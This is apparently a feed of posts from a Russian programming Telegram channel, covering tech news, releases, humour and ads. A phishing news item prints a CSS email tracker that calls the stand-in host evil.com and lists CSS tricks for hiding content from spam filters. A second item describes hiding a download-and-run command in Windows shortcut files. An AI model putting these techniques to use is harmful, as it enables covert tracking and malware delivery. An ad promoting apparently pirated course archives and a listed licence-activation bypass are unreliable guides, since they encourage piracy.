Прогер

Скончался глава Samsung, Чонхи Хан. Последние три года фактически занимал пост генерального директора всей группы компаний. Причиной смерти стала сердечная болезнь, обострившаяся на свадьбе его дочери Несколько недель назад в интервью он заявил, что Samsung находится в состоянии «сделай или умри». Ну, что сказать, делать придется кому-то другому 💀 ✅ Умный программист | #новость

Как устроена underlay-сеть облачного провайдера? 🚀 В МТС Web Services продолжается стройка нового облака, а разработчики платформы не устают рассказывать об этом в прямом эфире. В очередном выпуске реалити для инженеров Building the Cloud вы узнаете, как в MWS подошли к созданию underlay-сети. Регистрируйтесь, добавляйте событие в календарь и задавайте вопросы спикерам в чате во время эфира. За лучший вопрос дарим фирменный мерч MWS. 📅 Дата: 3 апреля, 11:00 🌐 Регистрация

Самодельный ПК в столе ✅ Умный программист | #гаджет

Роскомнадзор объяснил сбои в Рунете 24 марта использованием сервисами иностранных серверов По данным регулятора, причиной этого является использование иностранной серверной инфраструктуры, на которой фиксируются сбои и рекомендовал отечественным организациям использовать российских хостинг-провайдеров 🗿 ✅ Умный программист | #новость

Сэм Альтман призвал вместо программирования учиться «хорошо использовать ИИ-инструменты» «Я полагаю, что у программистов в течение некоторого времени будет очень много работы. А потом в какой-то момент, да, возможно, нам действительно понадобится меньше программистов», — заявил он Альтман отметил, что раньше «очевидной тактикой» было изучение программирования, а теперь — «просто научиться очень хорошо использовать ИИ-инструменты» 😆 Фантазёр, ты меня называлааа... А вообще, бывало ли в истории крупных компаний, чтобы создатель заявлял, что их продукт не нужен и не стоит в него инвестировать? ✅ Умный программист | #новость

Тест на тимлида ✅ Умный программист | #юмор

Берем любимые отвертки и сломанные гаджеты: 25-26 апреля Яндекс проведет Repair Cafe Яндекс — компания, которую создали люди с инженерным мышлением. У команды полный in-house цикл производства железа, что позволяет создавать роверов, умные устройства, Станции и многое другое. Для тех, кто любит копаться в микросхемах и держать отвёртку, Яндекс проводит Repair Cafe. Главной точкой притяжения станет мастерская — пространство, где можно разбирать и чинить гаджеты под руководством опытных наставников. На мероприятии также можно будет послушать доклады о том, как сделать устройство для чтения ДНК напильником или узнать, как бьется сердце робота. Бонус для любителей олдового железа: на ивенте починят ПК «Ленинград» (выпускался в конце 80-х), который когда-то многие перебирали по деталям. А еще будут воркшопы с разбором самоката, интерактивная выставка и многое другое. Посмотреть программу и зарегистрироваться можно тут.

Keenetic 2 года скрывала о взломе базы данных своего мобильного приложения Компания официально подтвердила взлом IT-инфраструктуры: злоумышленники получили доступ к данным пользователей мобильного приложения, зарегистрированных до 16 марта 2023 года Хакеры похитили электронные адреса, логины аккаунтов, пароли VPN (PPTP/L2TP, IPSec), а также настройки устройств По заявлению Keenetic, до февраля 2025 года не было признаков утечки. Однако компания рекомендовала пользователям из группы риска сменить пароли учётных записей, пароли Wi-Fi, VPN-клиентов и предварительные ключи для PPTP/L2TP, L2TP/IPSec, IPSec Site-to-Site, SSTP Вопрос: зачем они хранили всю эту информацию (все пароли от учеток, VPN'ов, все настройки роутера и т.д.) на своих серверах? Для работы мобильного приложения, которое просто дает доступ к своему роутеру, это ведь не нужно 💁‍♂️ ✅ Умный программист | #новость

Cloudflare теперь визуализирует энтропию с помощью лавовых ламп и в офисе в Португалии Компания уже реализовывала подобные проекты. Ранее она установила аналогичную стену в Сан-Франциско. Подробнее об этом — в последнем видео Серверы Cloudflare обрабатывают до 100 млн HTTP-запросов в секунду, большинство из них защищены TLS. Для надёжной работы CSPRNG необходима высококачественная энтропия Изображение хэшируется в последовательность байтов, которые вместе с предыдущим начальным числом и системной энтропией служат входными данными для KDF. Эта функция генерирует новое начальное число для CSPRNG, способного выдавать практически неограниченное количество случайных байтов. API LavaRand применяется, например, в Math.random() в Cloudflare Workers По сути это генераторы настоящих случайных чисел, и такая система используется для инициализации генераторов случайных чисел на их серверах ✅ Умный программист | #новость

⚡️ Айтишник из «VISION» скупил курсы айти школ и выложил гигабайты материалов к себе Каждый найдет что-то по душе: 1202 ГБ — Python 1811 ГБ — Frontend 1100 ГБ — C / C++ / C# 804 ГБ — Java 411 ГБ — SQL & БД 309 ГБ — DevOps 998 ГБ — ИБ & Хакинг 773 ГБ — Kotlin / Swift 189 ГБ — PHP 201 ГБ — GoLang 170 ГБ — Rust 167 ГБ — QA / Тестирование 310 ГБ — 1C + Лицензии 495 ГБ — Машинное обучение 704 ГБ — Аналитика Данных 991 ГБ — Дизайн Материалы в закрепе, постоянно пополняются👆🏻

Дайджест релизов: 15–28 февраля TaskExplorer 1.6.0 — это расширенный инструмент диспетчера задач для ПК на ОС Windows 7 и новее. Улучшены элементы для соответствия современным требованиям, добавлены новые функции, улучшены параметры безопасности и управления процессами LinuxPDF — Linux в PDF в браузере. Проект открывается только в браузерах на базе Chromium, использующих движок PDFium OpenWrt 24.10.0 — это открытая операционная система на базе Linux для маршрутизаторов и встраиваемых устройств. Добавлены поддержка TLS 1.3, MPTCP, Wi-Fi 7, более 100 новых устройств, платформы для SoC AllWinner D1, StarFive JH71×0, Intel XScale, LoongArch и STM32, улучшена работа с DSA, обновлены ядро, пакеты и поддержка устройств, а также сохранён пакетный менеджер OPKG OpenLDK — это компилятор Just-In-Time (JIT) и среда выполнения для Java, полностью реализованная в Common Lisp LinkAce 2.0 — открытый инструмент для удобного архивирования, организации и распространения веб-ссылок LinkAce 2.0. Новые режимы отображения ссылок, переработанный интерфейс, оптимизированная навигация, улучшенные журналы аудита и команда CLI для проверки конфигурации электронной почты WinScript 1.1.1 — инструмент с открытым исходным кодом для уменьшения размера и оптимизации Windows 10/11 Go 1.24 — язык программирования, который используется для создания быстрых, масштабируемых и простых в обслуживании приложений, особенно для серверных решений и микросервисов. Добавлены дженерики с псевдонимами, улучшения для работы с утилитами через go tool, кеширование бинарников, автоматическое добавление информации о версии в бинарь, улучшения производительности, новые функции для тестирования и бенчмарков, а также поддержка слабых указателей и новые возможности для работы с финалайзерами rust-lang-translations — неофициальный проект перевода документации для Rust на различные языки Explorer Tab Utility v2.0.0 — утилита для исправления недостающих функций в проводнике Windows 11 Microsoft Activation Scripts 3.0 — свободный активатор для перманентной (постоянной) активации через PowerShell ОС Windows 8 и старше, а также приложений Microsoft Office Rust 1.85.0 — безопасный и быстрый язык для системного программирования. Добавлена поддержка асинхронных замыканий, атрибут #[diagnostic::do_not_recommend], возможность использования типажей FromIterator и Extend с кортежами до 12 элементов и второй уровень поддержки платформы powerpc64le-unknown-linux-musl Nextcloud Hub 10 — платформа для организации совместной работы. Добавлены новые виджеты, улучшения в чате и Teams, поддержка Smart Picker и AppAPI, интеграция с платформами, оптимизация производительности, улучшения установки и безопасность OpenCloud 1.0 — открытая платформа для обмена файлами и совместной работы, альтернатива Microsoft SharePoint, Google Drive и Dropbox, соответствующая требованиям GDPR ✅ Умный программист | #дайджест

Новая техника фишинга использует CSS для обхода спам-фильтров и слежки за пользователями Эксперты Cisco Talos выявили схему, которая позволяет хакерам доставлять фишинговые письма и отслеживать жертв. В отличие от методов с JavaScript, здесь задействован CSS, что усложняет обнаружение угроз почтовыми фильтрами Злоумышленники встраивают в HTML-письмо особый CSS-код, который помогает скрывать вредоносный контент, организовывать слежку и обходить детекцию. Скрытие достигается за счет использования CSS-свойств, таких как text-indent: -9999px, opacity: 0, position: absolute с отрицательными координатами. Слежка осуществляется через @media-запросы, которые фиксируют изменение размеров окна, взаимодействие с письмом и другие параметры, передавая данные на сервер злоумышленников. Весь механизм работает без JavaScript, из-за чего письмо выглядит менее подозрительно Пример кода, реализующего такой трекер:

<style>
  .tracker { display: none; }
  @media (max-width: 600px) {
    .tracker { display: block; background: url('http://evil.com/track?user=1'); }
  }
</style>
<div class="tracker"></div>

Этот код активируется при изменении размеров окна просмотра письма, например, при его открытии на мобильном устройстве, и инициирует скрытый запрос на сервер злоумышленников Технически схема основана только на HTML и CSS, поэтому не блокируется защитой от скриптов. Спам-фильтры пока не анализируют такие конструкции глубоко, а скрывать контент можно разными способами: font-size: 0, clip-path, visibility: hidden и другими методами Защититься можно, усилив фильтрацию писем и проверяя @media-запросы, отслеживая обращения к подозрительным доменам из почтовых клиентов и проводя обучение пользователей Пока метод не получил массового распространения, но он способен обходить стандартные защиты и может стать трендом, особенно в корпоративной среде 😕 ✅ Умный программист | #новость

Самые безбашенные репозитории на GitHub Долгие «раскопки» на GitHub принесли коллекцию проектов, которые можно описать двумя словами — полный треш • not-paid — на главный тег страницы вешается стиль с прозрачностью, процент которой каждый день увеличивается. Таким образом сайт постепенно «исчезает» — до тех пор пока автору не заплатят • activate-linux — интересный повод заехать в дурку для сисадмина-линуксоида, если подсунуть ему плашку «Activate Windows», портированную на Linux • Хороший Учебный Язык (ХУЯ) — полноценный компилятор к 1 апреля • pygyat — зумерский синтаксис для питона • В†† — великий язык программирования древних русов • BossSensor — нейросеть с компьютерным зрением, которая замечает приближение начальника и мгновенно переключает экран на рабочее приложение • my_first_calculator.py — самая тупая реализация калькулятора • volkswagen — проект, названный в честь известного фейла компании Volkswagen. Если решитесь повторить, то найдёте отличный повод быстро получить по лицу, если вас поймают за таким делом • lolcommits — делает снимок с веб-камеры при каждом git commit, превращая его в мем. Запускать на своих проектах не решился Отличный набор проектов и технологий для добавления в резюме! Всё равно резюме никто не читает 🤪 ✅ Умный программист | #полезно

Microsoft игнорирует 8-летнюю уязвимость в ярлыках, используемую для шпионажа Trend Micro ZDI сообщает о масштабной кампании APT-атак, эксплуатирующих уязвимость ZDI-CAN-25373 в Windows-ярлыках (.lnk). Эта брешь позволяет скрытно выполнять вредоносные команды, маскируя их под безобидные файлы Microsoft получила детальный эксплойт (proof-of-concept) от Trend Micro, но сочла проблему «низкоприоритетной», заявив, что это лишь «ошибка отображения в интерфейсе», а не серьезная угроза безопасности Суть уязвимости — манипуляция содержимым .lnk файлов. В поле COMMAND_LINE_ARGUMENTS (аргументы запуска) атакующие вставляют множество невидимых символов: • \x20 — пробел • \x09 — горизонтальная табуляция • \x0A — перенос строки • \x0B — вертикальная табуляция • \x0C — прогон страницы • \x0D — возврат каретки В результате Windows не отображает полную команду в поле «Объект», скрывая вредоносный код Злоумышленник создает .lnk файл, добавляя сотни пробелов и табуляций, за которыми прячется вредоносная команда (например, скачивание и запуск PowerShell-скрипта). В свойствах ярлыка жертва видит лишь путь к безобидному файлу и пустое пространство. При запуске Windows выполняет всю строку, включая скрытый код Некоторые северокорейские APT-группы (Earth Manticore, Earth Imp) увеличивают размер .lnk файлов до 70 МБ, заполняя их лишними символами для маскировки. В некоторых случаях комбинации \x0A и \x0D приводят к тому, что в поле «Объект» виден лишь один символ, скрывая остальное содержимое Так что если видишь подозрительный ярлык — не ленись, сразу выделяй всю его командную строку. Вдруг в конце множества пробелов прикрывается неприятный сюрприз ✅ Умный программист | #новость

Lego инвестирует в собственную студию разработки видеоигр Недавняя коллаборация с Fortnite привлекла 87 млн пользователей, что только укрепило желание Lego запустить собственную студию разработки видеоигр Ждем новый лего-мир по типу майнкрафта? Было бы неплохо 🙂 Не только кубики, но и разные механизмы — валы, шестерёнки, передачи, моторчики и т.п. ✅ Умный программист | #новость

Factorio стала новым бенчмарком для ИИ Исследователи используют игру для оценки способности языковых моделей планировать и строить сложные системы, управляя ресурсами и производственными цепочками Для этого создана среда Factorio Learning Environment (FLE) с двумя режимами: «Lab-Play» (24 задачи) и «Open Play», где агенты исследуют процедурно сгенерированные карты, строя фабрики. Модели взаимодействуют с игрой через Python API, а их успех оценивается по «производственному показателю» и достижению ключевых «вех» Были протестированы 6 LLM, включая Claude 3.5 Sonnet и GPT-4o. Результаты показали сложности с пространственным мышлением, планированием и исправлением ошибок. Лучший результат у Claude 3.5 Sonnet — 15 из 24 успешных задач в «Lab-Play» ✅ Умный программист | #новость

В американских социальных сетях зумеры популяризируют тренд taskmasking — хорошо знакомую многим симуляцию бурной деятельности. Делают они это в знак протеста против требований компаний вернуться в офис Менеджеры отмечают, что симуляция бурной деятельности была и раньше, но о ней не говорили открыто и стеснялись поднимать эту тему в коллективе. Зумеры же, наоборот, сделали из этого тренд, массово призывают в социальных сетях не брать на себя больше обязанностей и делятся советами 😁 До запуска очередного ИИ для слежки за сотрудниками: 3... 2... 1... ✅ Умный программист | #новость

Создателями популярного приложения Cal AI для подсчёта калорий на фото еды оказались два подростка Заку Ядегари и Генри Лэнгмаку по 18 лет, и они недавно окончили среднюю школу. За восемь месяцев их ИИ-приложение собрало более 5 млн скачиваний и принесло более $2 млн дохода в прошлом месяце История их успеха — не про случайное везение. Ребята кодят с девяти лет. Ещё в школе они придумали сборник игр, который обходил блокировки и устанавливался на учебные ноутбуки Chromebook, а затем продали его за $100 000 Гении вовремя прикрутили API ChatGPT к приложению, запрыгнув на волну хайпа. Людей даже не смущает, что две абсолютно одинаковые картинки могут отличаться по количеству калорий 🤔 ✅ Умный программист | #новость

Китайский производитель компьютерных аксессуаров Aceele выпустил подключаемые к ноутбуку 4K-дисплеи Компания собрала на Kickstarter более $1 млн всего за неделю с момента релиза Оба экрана имеют идентичные характеристики: это 14-дюймовые панели с разрешением 4K, яркостью до 300 нит и частотой обновления 60 Гц. Их можно использовать с ноутбуками диагональю от 13 до 16,5 дюйма Дисплеи крепятся на гибких шарнирах, позволяя легко складывать их, а ноутбук размещается в специальной регулируемой нише, напоминающей лоток. Вес конструкции — 1,4 кг Цена — $469. Также есть модель с одним 1080p-экраном за $289 ✅ Умный программист | #гаджет